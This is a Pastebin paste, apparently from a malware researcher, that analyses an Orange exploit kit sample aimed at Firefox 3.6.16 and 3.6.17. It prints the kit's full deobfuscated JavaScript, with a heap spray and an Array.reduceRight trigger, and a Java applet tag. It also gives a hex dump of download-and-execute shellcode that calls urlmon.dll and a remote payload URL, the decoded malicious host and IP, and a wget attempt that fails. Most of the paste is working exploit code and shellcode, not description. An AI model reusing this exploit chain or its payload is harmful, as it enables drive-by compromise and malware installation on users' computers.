Advertisement
unixfreaxjp

Firefox Agent Test for the Orange EK

Aug 30th, 2012
108
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -----------------------------
  2. Firefox Agent Test for the Orange EK;
  3. It is proved it drops mess adjusting to my firefox browser
  4. -----------------------------
  5. document.write("
  6. <applet archive=\"27\" code=\"KiaDA.class\" width=\"8\" height=\"18\"><param name=\"ur34\"
  7. value=\"103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110
  8. !113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!7
  9. 9!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53\"><param name=\"enm3\" value
  10. =\"75!115!49!109!80!101!105!45!100!119!100\"></applet>");
  11. document.write("<object id=\"d\"><object>");
  12. document.write("<embed src=\"265\" width=\"508\" height=\"367\">");
  13. var myobject = document.getElementById('d');
  14. function GetUrl(){
  15. return "
  16. 103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!
  17. 108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!6
  18. 2!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53";
  19. }
  20. ;
  21. function myescape(input){
  22. var output = '';
  23. ff = 255;
  24. f = 0;
  25. if (input.length % 2){
  26. f = 1;
  27. }
  28. for (var i = 0; i < input.length; i += 2){
  29. output += '%u';
  30. if (i == (input.length - 1)){
  31. output += 'ff';
  32. }
  33. else {
  34. output = output + input.charCodeAt(i + 1).toString(16);
  35. }
  36. output += input.charCodeAt(i).toString(16);
  37. }
  38. if (!f){
  39. output = output + '%uffff';
  40. }
  41. return output;
  42. }
  43. ;
  44. function spray(){
  45. var ptrs = unescape("
  46. %u0000%u0048%u0c00%u5864%u704e%u5349%u587a%u4157%u6844%u564a%u5143%u4359%u7674%u666c%u6a71
  47. %u5174%u4a69%u414e%u4166%u0000%u26f0%u104c%u5846%u426e%u0000%u240c%u3410%u007c%u0c00%u5326
  48. %u1005%u6379%u624a%u7959%u694f%u4663%u4445%u4261%u574b%u6666%u4d71%u7148%u4153%u4b47%u4244
  49. %u6f72%u5942%u655a%u784e%u4a66%u6a68%u4c67%u7879%u002e%u0c00");
  50. var bheader = 0x12 / 2;
  51. var nullt = 0x2 / 2;
  52. var scode = unescape("
  53. %u5eeb%u335f%u99c0%u6a50%ub201%u5745%uf78b%u23b2%udf8b%uda03%u46b2%uda03%ub253%u030a%u8bda
  54. %uaafb%u8b5b%u50fe%u5750%u45b2%ufa03%ub2aa%u0323%ub2fa%u030b%u80fa%u003f%u0175%u5747%u5050
  55. %ub057%u66ff%uffb9%uf2ff%u4fae%u07c6%u5f00%u8b58%ub2fe%u0346%u53fa%uc68b%u5e05%u0000%u5000
  56. %u5656%u466a%u02eb%u79eb%u6a57%u5930%u8b64%u8b01%u0c40%u688b%u8b1c%u085d%u6d8b%u5500%u438b
  57. %u8b3c%u1844%u0b78%u74c0%u8d31%u1874%uad18%uad91%uc303%uad50%u3c8d%uad03%u2c8d%u8b03%u8f74
  58. %u03fc%u33f3%u33c0%u99d2%u03ac%uc1d0%u05c2%u7948%u8bf7%u2474%u3b08%u7416%ue206%u58e2%ueb5d
  59. %u58ba%ub70f%u4d54%u03fe%u901c%u5f5d%ud3ff%uebab%u579d%u7c8b%u0824%u6650%uffb8%uf200%u4fae
  60. %uc033%u0788%u5f58%u04c2%ue800%uff22%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
  61. %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff
  62. %uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%uffff%u1529%u54d2%ufabd
  63. %u4c58%u70cc%u6b77%uf259%u23cb%u6664%u11b4%u1fb1%u1a3e%u6363%u6363%u6363%u652e%u6578%u7500
  64. %u6c72%u6f6d%u2e6e%u6c64%uff6c%u7468%u7074%u2f3a%u642f%u6569%u6573%u2e6c%u6874%u6865%u6369
  65. %u6f6b%u7972%u6f6d%u6f74%u6d72%u6c69%u2e65%u6f63%u3a6d%u3338%u3238%u6f2f%u6873%u6250%u3f59
  66. %u7865%u6970%u3d64%u3331%u6626%u6469%u323d%u36") + unescape(myescape(GetUrl()));
  67. var payload = unescape("
  68. %u6c6e%u706c%u454d%u7453%u4a45%u7554%u616b%u6561%u526f%u7573%u1806%u101f%u828c%u1083%u0d7b
  69. %u103e%u8002%u102d%u876b%u1003%u0001%u1004%u0001%u0000%u6917%u104e%u1000%u0000%uc000%u102a
  70. %u0040%u0000%u0005%u102e%uc001%u102a%u1806%u101f%u9090%u9090%u3401%u102b%u9090%u9090") +
  71. scode;
  72. var tr_padding = unescape("%u0c0c%u0c0c");
  73. while (tr_padding.length < 0x7fa00){
  74. tr_padding += tr_padding;
  75. }
  76. var dummy = ptrs + payload + tr_padding;
  77. var hspray = dummy.substring(0, 0x7fa00 - bheader - nullt);
  78. HeapBlocks = new Array();
  79. for (i = 0; i < 0x100; i ++ ){
  80. HeapBlocks[i] += hspray;
  81. }
  82. }
  83. ;
  84. if ((navigator.userAgent.indexOf("Firefox/3.6.16") != - 1) || (navigator.userAgent.
  85. indexOf("Firefox/3.6.17") != - 1)){
  86. spray();
  87. obj = new Array();
  88. obj.length = 2197815302;
  89. f = function trigger(prev, myobj, indx, array){
  90. alert(myobj[0]);
  91. }
  92. ;
  93. obj.reduceRight(f, 1, 2, 3);
  94. }
  95. -----------------------------
  96. Generating java applet:
  97. -----------------------------
  98. <applet archive="27" code="KiaDA.class" width="8" height="18">
  99. <param name="ur34" value= "103!115!115!111!57!46!46!99!104!100!114!100!107!45!115!103!100!103!104!98!106!110!113!120!108!110!115!110!113!108!104!107!100!45!98!110!108!57!55!50!55!49!46!110!114!103!79!97!88!62!100!119!111!104!99!60!48!50!37!101!104!99!60!49!53">
  100. <param name="enm3" value="75!115!49!109!80!101!105!45!100!119!100"></applet>
  101. ↑There goes the exploit
  102.  
  103.  
  104. -----------------------------
  105. Popping he below shellcode;
  106. -----------------------------
  107. eb 5e 5f 33 c0 99 50 6a 01 b2 45 57 8b f7 b2 23
  108. 8b df 03 da b2 46 03 da 53 b2 0a 03 da 8b fb aa
  109. 5b 8b fe 50 50 57 b2 45 03 fa aa b2 23 03 fa b2
  110. 0b 03 fa 80 3f 00 75 01 47 57 50 50 57 b0 ff 66
  111. b9 ff ff f2 ae 4f c6 07 00 5f 58 8b fe b2 46 03
  112. fa 53 8b c6 05 5e 00 00 00 50 56 56 6a 46 eb 02
  113. eb 79 57 6a 30 59 64 8b 01 8b 40 0c 8b 68 1c 8b
  114. 5d 08 8b 6d 00 55 8b 43 3c 8b 44 18 78 0b c0 74
  115. 31 8d 74 18 18 ad 91 ad 03 c3 50 ad 8d 3c 03 ad
  116. 8d 2c 03 8b 74 8f fc 03 f3 33 c0 33 d2 99 ac 03
  117. d0 c1 c2 05 48 79 f7 8b 74 24 08 3b 16 74 06 e2
  118. e2 58 5d eb ba 58 0f b7 54 4d fe 03 1c 90 5d 5f
  119. ff d3 ab eb 9d 57 8b 7c 24 08 50 66 b8 ff 00 f2
  120. ae 4f 33 c0 88 07 58 5f c2 04 00 e8 22 ff ff ff
  121. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  122. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  123. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  124. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
  125. ff ff ff ff ff ff 29 15 d2 54 bd fa 58 4c cc 70
  126. 77 6b 59 f2 cb 23 64 66 b4 11 b1 1f 3e 1a 63 63
  127. 63 63 63 63 2e 65 78 65 00 75 72 6c 6d 6f 6e 2e
  128. 64 6c 6c ff 68 74 74 70 3a 2f 2f 64 69 65 73 65
  129. 6c 2e 74 68 65 68 69 63 6b 6f 72 79 6d 6f 74 6f
  130. 72 6d 69 6c 65 2e 63 6f 6d 3a 38 33 38 32 2f 6f
  131. 73 68 50 62 59 3f 65 78 70 69 64 3d 31 33 26 66
  132. 69 64 3d 32
  133.  
  134.  
  135. -----------------------------
  136. use kernel.dll & urlmon.dll
  137. -----------------------------
  138. target:
  139. http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13&fid=2
  140.  
  141.  
  142.  
  143. -----------------------------
  144. Download efforts...
  145. -----------------------------
  146. --19:26:05-- http://diesel.thehickorymotormile.com:8382/oshPbY?expid=13
  147. => `oshPbY@expid=13'
  148. Resolving diesel.thehickorymotormile.com... 173.212.222.188
  149. Connecting to diesel.thehickorymotormile.com|173.212.222.188|:8382... connected.
  150. HTTP request sent, awaiting response... 502 Bad Gateway
  151.  
  152. -----------------------------
  153. Looks like the url is expired :-))
  154. -----------------------------
Advertisement
RAW Paste Data Copied
Advertisement